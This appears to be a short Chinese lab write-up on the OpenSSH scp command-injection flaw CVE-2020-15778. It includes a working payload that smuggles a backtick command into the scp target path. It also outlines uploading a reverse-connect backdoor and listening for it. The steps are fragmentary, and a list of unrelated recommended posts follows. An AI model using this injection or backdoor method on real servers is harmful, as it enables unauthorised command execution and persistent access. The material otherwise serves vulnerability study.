openssh 命令注入 (CVE-2020-15778)

描述:

OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。
OpenSSH的小于等于8.3p1版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。密码vulfocus:vulfocus

#意思是复制当前目录下的test.txt到目标的/tmp目录下,并且执行 touch /tmp/test.sh 的命令

scp / test.sh root@192.168.10.129:'`cat /tmp/test.sh`/tmp/test.sh'

没有使用小于8.3版本的openssh,只能进行文件上传和下载。也可以拿到后门

首先在本地编写好反联后门

Touch chengwenji.sh

Nano chengwenji.sh

使用scp进行上传

开启端口监听👂

这个条件比较苛刻,需要用户自己打开后门

相关推荐
没刮胡子13 天前
CentOS6升级OpenSSH9.2和OpenSSL3
linux·openssh·centos6·升级openssl
专业机床数据采集22 天前
西门子网络程序传输,无需开通网络驱动器直接接入底层,支持各类数控 如发那科、三菱 、新代、海德汉、广数、精雕、马扎克等等
网络·scp·采集·程序传输·机床数据采集·西门子马扎克海德汉发那科·三菱新代凯恩帝牧野广州数控广数
橘色的喵1 个月前
Linux Shell: 使用 Expect 自动化 SCP 和 SSH 连接的 Shell 脚本详解
linux·ssh·scp·expect·远程·自动登录
查士丁尼·绵2 个月前
openssh8.6p1编译安装
openssh
LostSpeed2 个月前
debian12 - 修改SSH端口连接回包
openssh·debian12
caz283 个月前
scp命令的使用
scp
weixin_431697203 个月前
ubuntu2204升级openssh
ubuntu·openssh
庞德公4 个月前
CVE-2024-6387漏洞预警:尽快升级OpenSSH
安全·openssh
安全二次方security²5 个月前
ARM功耗管理框架之SCP
scp·power manage·系统控制处理器·arm功耗管理·功耗管理精讲与实战·功耗管理框架·mhu